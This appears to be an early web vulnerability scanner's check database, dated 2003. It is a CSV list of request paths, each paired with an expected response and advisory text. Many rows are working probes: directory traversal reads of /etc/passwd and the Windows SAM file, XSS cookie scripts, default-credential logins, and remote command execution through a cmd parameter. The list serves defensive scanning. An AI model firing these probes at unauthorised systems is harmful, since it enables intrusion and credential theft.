#VERSION,1.149
#LASTMOD,05.20.2003  
# http://www.cirt.net

########################################################################
# Checks: ws type,root,method,file,result,information,data to send
########################################################################
# <script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET"
# Cross Site Scripting (XSS). CA-2000-02."

"abyss","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[fonts]","GET","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version."
"abyss","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[windows]","GET","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version."
"abyss","/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////","index of","GET","Abyss 1.03 reveals directory listing when 256 /'s are requested."
"abyss","/conspass.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request."
"abyss","/consport.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request."
"abyss","/general.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request."
"abyss","/srvstatus.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request."
"alchemyeye","@CGIDIRS../../../../../../../../../../WINNT/system32/ipconfig.exe","IP Configuration","GET","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
"alchemyeye","@CGIDIRSNUL/../../../../../../../../../WINNT/system32/ipconfig.exe","IP Configuration","GET","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
"alchemyeye","@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe","IP Configuration","GET","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
"apache","/.DS_Store","Bud1","GET","Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version."
"apache","/.FBCIndex","Bud2","GET","This file son OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html"
"apache","//","not found for:","OPTIONS","By sending an OPTIONS request for /, the physical path to PHP can be revealed."
"apache","/666%0a%0a<script>alert('Vulnerable');</script>666.jsp","<script>alert('Vulnerable');</script>","GET","Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"apache","/?D=A","index of \/","GET","Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
"apache","/?M=A","index of \/","GET","Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
"apache","/?N=D","index of \/","GET","Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
"apache","/?S=A","index of \/","GET","Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
"apache","/admin.cgi","Administration","GET","InterScan VirusWall administration is accessible without authentication."
"apache","/blah-whatever.jsp","JSP file \"","GET","The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CAN-2000-0759."
"apache","/cgi-bin/main_menu.pl","NetDetector Traffic Analysis","GET","The NetDetector allows unauthenticated users to perform database queries."
"apache","/cgi-bin/printenv","DOCUMENT_ROOT","GET","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed."
"apache","/cgi-bin/printenv","Premature end of script headers: /","GET","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths."
"apache","/cgi-bin/search","=sourcedir","GET","Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value)."
"apache","/cgi-bin/test-cgi","PATH_TRANSLATED","GET","Apache 2.0 default script is executable and reveals system information. All default scripts should be removed."
"apache","/cgi-bin/test-cgi","Premature end of script headers: /","GET","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths."
"apache","/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:","root:","GET","SunPS iRunbook Version 2.5.2 allows files to be read remotely."
"apache","/content/base/build/explorer/none.php?/etc/passwd","root:","GET","SunPS iRunbook Version 2.5.2 allows files to be read remotely."
"apache","/doc/rt/overview-summary.html","overview","GET","Oracle Business Components for Java 3.1 docs is running."
"apache","/docs/","200","GET","May give list of installed software"
"apache","/docs/sdb/en/html/index.html","Support Database","GET","This may be a default SuSe Apache install. This is the support page."
"apache","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","[windows]","GET","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661."
"apache","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[fonts]","GET","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661."
"apache","/error/HTTP_NOT_FOUND.html.var","Available variants","GET","Apache reveals file system paths when invalid error documents are requested."
"apache","/examples/","Directory Listing","GET","Directory indexing enabled, also default JSP examples."
"apache","/examples/jsp/index.html","JSP Samples","GET","Apache Tomcat default JSP pages present."
"apache","/examples/jsp/snp/snoop.jsp","Request Information","GET","Displays information about page retrievals, including other users."
"apache","/examples/jsp/source.jsp??","Directory Listing","GET","Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed."
"apache","/examples/servlet/AUX","200","GET","Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file."
"apache","/examples/servlet/TroubleShooter","TroubleShooter Servlet Output","GET","Tomcat default jsp page reveals system information and may be vulnerable to XSS."
"apache","/examples/servlets/index.html","Servlet Examples","GET","Apache Tomcat default JSP pages present."
"apache","/icons/","200","GET","Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used all, the /icons directory should be removed."
"apache","/index.html.ca","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.cz.iso8859-2","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.de","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.dk","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.ee","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.el","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.en","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.es","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.et","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.fr","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.he.iso8859-8","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.hr.iso8859-2","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.it","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.ja.iso2022-jp","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.kr.iso2022-kr","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.ltz.utf8","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.lu.utf8","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.nl","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.nn","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.no","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.po.iso8859-2","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.pt","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.pt-br","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.ru.cp-1251","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.ru.cp866","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.ru.iso-ru","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.ru.koi8-r","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.ru.utf8","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.se","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.tw","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.tw.Big5","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/index.html.var","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
"apache","/interscan/","Administration","GET","InterScan VirusWall administration is accessible without authentication."
"apache","/jservdocs/","200","GET","Default Apache JServ docs should be removed."
"apache","/lpt9","FileNotFoundException:","GET","Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher."
"apache","/manual/images/","200","GET","Apache 2.0 directory indexing is enabled, it should only be enabled for specific directories (if required). Apache's manual should be removed and directory indexing disabled."
"apache","/NetDetector/middle_help_intro.htm","NIKSUN-HELP","GET","The system appears to be a Niksun NetDetector (network monitoring). ÊThe help files should be available at /NetDetector/quick_help_index.html"
"apache","/oem_webstage/cgi-bin/oemapp_cgi","This script","GET","Oracle reveals the CGI source by prepending /oem_webstage to CGI urls."
"apache","/oem_webstage/oem.conf","DocumentRoot","GET","Oracle reveals a portion of the Apache httpd.conf file."
"apache","/php/php.exe?c:\boot.ini","boot loader","GET","The Apache config allows php.exe to be called directly."," "
"apache","/pls/admin","ENVIRONMENT","GET","Oracle Apache+WebDB gives a lot of system information via the pls/admin script"
"apache","/server-info","200","GET","This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts."
"apache","/server-status","200","GET","This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts."
"apache","/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
"apache","/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
"apache","/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
"apache","/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
"apache","/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. CA-2000-02."
"apache","/site/eg/source.asp","200","GET","This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CAN-2000-0628."
"apache","/soap/servlet/soaprouter","200","GET","Oracle 9iAS SOAP components allow anonymous users to deploy applications by default."
"apache","/soapConfig.xml","200","GET","Oracle 9iAS configuration file found - see bugrtraq #4290."
"apache","/stronghold-info","200","GET","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. CAN-2001-0868."
"apache","/stronghold-status","200","GET","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. CAN-2001-0868."
"apache","/test","test hierarchy","GET","Apache Tomcat default file found. All default files should be removed."
"apache","/test.php","Current PHP version","GET","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information."
"apache","/test/jsp/buffer1.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/buffer2.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/buffer3.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/buffer4.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/declaration/IntegerOverflow.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/extends1.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/extends2.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/Language.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageAutoFlush.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageDouble.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageExtends.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageImport2.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageInfo.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageInvalid.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageIsErrorPage.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageIsThreadSafe.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageSession.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/realPath.jsp","WEBROOT","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/tomcat-docs/index.html","200","GET","Default Apache Tomcat documentation found."
"apache","/XSQLConfig.xml","200","GET","Oracle 9iAS configuration file found - see bugrtraq #4290."
"apache","/~nobody/etc/passwd","root:","GET","Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf."
"apache","@CGIDIRS.htaccess","200","GET","Contains authorization information"
"apache","@CGIDIRStest-cgi.bat","200","GET","This is an Apache for Win default. If Apache is lower than 1.3.23, this can be exploited as in test-cgi.bat?|dir+c:+>..\htdocs\listing.txt, but may not allow data sent back to the browser."
"cern","/.wwwacl","200","GET","Contains authorization information"
"cern","/.www_acl","200","GET","Contains authorization information"
"cern","@CGIDIRS.wwwacl","200","GET","Contains authorization information"
"cern","@CGIDIRS.www_acl","200","GET","Contains authorization information"
"cern","@CGIDIRSls"," neither '/","GET","The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained."
"citrix","/applist.asp","200","GET","Citrix server may allow remote users to view applications installed without authenticating."
"citrix","/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/","boot loader","GET","Citrix CGI allows directory traversal."
"compaq","/proxy/ssllogin?user=administrator&password=administrator",">administrator<","GET","Compaq Web-Based Management allows login with id/pass 'administrator'/'administrator'."
"compaq","/proxy/ssllogin?user=administrator&password=operator",">operator<","GET","Compaq Web-Based Management allows login with id/pass 'operator'/'operator'."
"compaq","/proxy/ssllogin?user=administrator&password=user",">user<","GET","Compaq Web-Based Management allows login with id/pass 'user'/'user'."
"compaq","/Survey/Survey.Htm","System Components","GET","This Compaq device, without authentication, gives lots of system information."
"compaq","/WEBAGENT/CQMGSERV/CF-SINFO.TPF","General Information","GET","This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL"
"compaq","http://127.0.0.1:2301/ HTTP/1.0","Compaq WBEM Device","GET","The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass. http://www.compaq.com/products/servers/management/SSRT0758.html"
"dwhttpd","/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar","200","GET","Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'."
"dwhttpd","/ab2/@AdminViewError","200","GET","Sun Answerbook allows viewing of the error logs without authentication."
"generci","/pmlite.php","200","GET","A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details." 
"generic","/","TRACE / HTTP/1.","TRACE","TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details"
"generic","/","TRACK / HTTP/1.","TRACK","TRACK option ('TRACE' alias) appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details"
"generic","/%00","File Name","GET","Appending /%00 to a request to the web server may reveal a directory listing."
"generic","/%00/","Directory listing of","GET","Remote directories can be retrieved, (this may be a Roxen server), upgrade the server."
"generic","/%0a%0a<script>alert(\"Vulnerable\")</script>.jsp","<script>alert(\"Vulnerable\")</script>","GET","Jetty jsp servlet engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/%22%3cscript%3ealert(%22xss%22)%3c/script%3e","<script>alert('Vulnerable')</script>","GET","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server."
"generic","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","root:","GET","Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org)."
"generic","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","[windows]","GET","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher."
"generic","/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","<script>alert('Vulnerable')</script>","GET","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server."
"generic","/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","<script>alert('Vulnerable')</script>","GET","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server."
"generic","/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html","<script>alert('Vulnerable')</script>","GET","Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server."
"generic","/%3f.jsp","Directory Listing","GET","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL."
"generic","/%3f.jsp","Index of","GET","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL."
"generic","/&lt;script&gt;alert('Vulnerable');&lt;/script&gt;","<script>alert('Vulnerable')</script>","GET","Server is vulnerable to cross site scripting (XSS) with HTML-encoded requests. CA-2000-02."
"generic","/.%252e/.%252e/.%252e/winnt/boot.ini","boot loader","GET","JWalk Web server allows any file to be retrieved from the remote system."
"generic","/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
"generic","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
"generic","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
"generic","/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
"generic","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
"generic","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
"generic","/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
"generic","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
"generic","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
"generic","/................../etc/passwd","root:","GET","The web server allows the password file to be retrieved."
"generic","/.../.../.../.../.../.../.../.../.../boot.ini","boot loader","GET","Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?"
"generic","/../../../../../../../../../../etc/passwd","root:","GET","It is possible to read files on the server by adding ../ in front of file name."
"generic","/..\..\..\..\..\..\temp\temp.class","200","GET","Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version."
"generic","/./","include\(\"","GET","Appending '/./' to a directory may reveal php source code."
"generic","/.access","200","GET","Contains authorization information"
"generic","/.addressbook","200","GET","PINE addressbook, may store sensitive e-mail address contact information and notes"
"generic","/.bashrc","200","GET","User home dir was found with a shell rc file. This may reveal file and path information."
"generic","/.bash_history","200","GET","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web."
"generic","/.cobalt/sysManage/../admin/.htaccess","AuthName","GET","Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory."
"generic","/.forward","200","GET","User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to."
"generic","/.history","200","GET","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web."
"generic","/.htaccess","200","GET","Contains authorization information"
"generic","/.htpasswd","200","GET","Contains authorization information"
"generic","/.lynx_cookies","200","GET","User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites."
"generic","/.passwd","200","GET","Contains authorization information"
"generic","/.pinerc","200","GET","User home dir found with a PINE rc file. May reveal system information, directories and more."
"generic","/.plan","200","GET","User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol "
"generic","/.proclog","200","GET","User home dir with a Procmail log file. May reveal user mail traffic, directories and more."
"generic","/.procmailrc","200","GET","User home dir with a Procmail rc file. May reveal sub directories, mail contacts and more."
"generic","/.profile","200","GET","User home dir with a shell profile was found. May reveal directory information and system configuration."
"generic","/.rhosts","200","GET","A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web."
"generic","/.sh_history","200","GET","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web."
"generic","/.ssh","200","GET","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web."
"generic","/.ssh/authorized_keys","200","GET","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web."
"generic","/.ssh/known_hosts","200","GET","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web."
"generic","////./../.../boot.ini","boot loader","GET","Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details."
"generic","///etc/hosts","200","GET","The server install allows reading of any system file by adding an extra '/' to the URL."
"generic","///etc/passwd","root:","GET","The server install allows reading of any system file by adding an extra '/' to the URL."
"generic","//admin/admin.shtml","200","GET","Axis network camera may allow admin bypass by using double-slashes before URLs."
"generic","//comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","<script>alert(document.cookie)</script>","GET","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02."
"generic","//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","<script>alert(document.cookie)</script>","GET","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02."
"generic","/<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/<script>alert('Vulnerable')</script>.aspx","<script>alert('Vulnerable')</script>","GET","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02."
"generic","/<script>alert('Vulnerable')</script>.jsp","<script>alert('Vulnerable')</script>.jsp","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/<script>alert('Vulnerable')</script>.shtml","<script>alert('Vulnerable')</script>.shtml","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/<script>alert('Vulnerable')</script>.thtml","<script>alert('Vulnerable')</script>.thtml","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/?mod=<script>alert(document.cookie)</script>&op=browse","<script>alert(document.cookie)","GET","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/?mod=node&nid=some_thing&op=view","/node.module.php","GET","Sage 1.0b3 may reveal system paths with invalid module names."
"generic","/?mod=some_thing&op=browse","in /","GET","Sage 1.0b3 reveals system paths with invalid module names."
"generic","/?sql_debug=1","SQL query: ","GET","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string."
"generic","/a%5c.aspx","Invalid file name for monitoring:","GET","Older Microsoft .NET installations allow full path disclosure."
"generic","/a.jsp/<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02."
"generic","/a/","200","GET","May be Kebi Web Mail administration menu."
"generic","/a?<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server."
"generic","/access-log","200","GET","Just found this log file..."
"generic","/access.log","200","GET","Just found this log file..."
"generic","/access/","200","GET","This might be interesting..."
"generic","/account/","200","GET","This might be interesting..."
"generic","/accounting/","200","GET","This might be interesting..."
"generic","/accounts/getuserdesc.asp","200","GET","Hosting Controller 2002 administration page is available. This should be protected."
"generic","/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/","http://xxxxxxxxxx/atk/","GET","Achievo can be made to include php files from another domain. Upgrade to a new version."
"generic","/active.log","WEBactive Http Server","GET","The WebActive log is accessible remotely."
"generic","/add.php","Failed opening '","GET","Ultimate PHP Board (UPB) final beta 1.0 reveals file system paths in add.php error messages."
"generic","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","AdManager 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."," "
"generic","/addressbook.php?\"><script>alert(Vulnerable)</script><!--","<script>alert(Vulnerable)</script>","GET","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;","<script>alert('Vulnerable')</script>","GET","phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/add_user.php","output started at /","GET","DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/admin.htm","200","GET","This might be interesting..."
"generic","/admin.html","200","GET","This might be interesting..."
"generic","/admin.html","MySimpleNews - Administration","GET","MySimpleNews contains the admin password in the login page HTML."," "
"generic","/admin.php","200","GET","This might be interesting..."
"generic","/admin.php3","200","GET","This might be interesting..."
"generic","/admin.php4?reg_login=1","200","GET","Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected."
"generic","/admin.php?en_log_id=0&action=config","200","GET","EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected."
"generic","/admin.php?en_log_id=0&action=users","200","GET","EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected."
"generic","/admin.shtml","200","GET","This might be interesting..."
"generic","/admin/","200","GET","This might be interesting..."
"generic","/Admin/","CobaltServer","GET","The web server is the CobaltRaq administrator. If password protection is broken, attackers will have access to admin your server. Use tcpwrappers or shut this down for safety."
"generic","/admin/admin_phpinfo.php4","200","GET","Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected."
"generic","/admin/browse.asp?FilePath=c:\&Opt=2&level=0","winnt","GET","Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely."
"generic","/admin/contextAdmin/contextAdmin.html","200","GET","Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin."
"generic","/admin/cplogfile.log","200","GET","DevBB 1.0 final (http://www.mybboard.com)  log file is readable remotely. Upgrade to the latest version."
"generic","/admin/exec.php3?cmd=cat%20/etc/passwd","root:","GET","DotBr 0.1 allows remote command execution."
"generic","/admin/exec.php3?cmd=dir%20c:\","boot.ini","GET","DotBr 0.1 allows remote command execution."
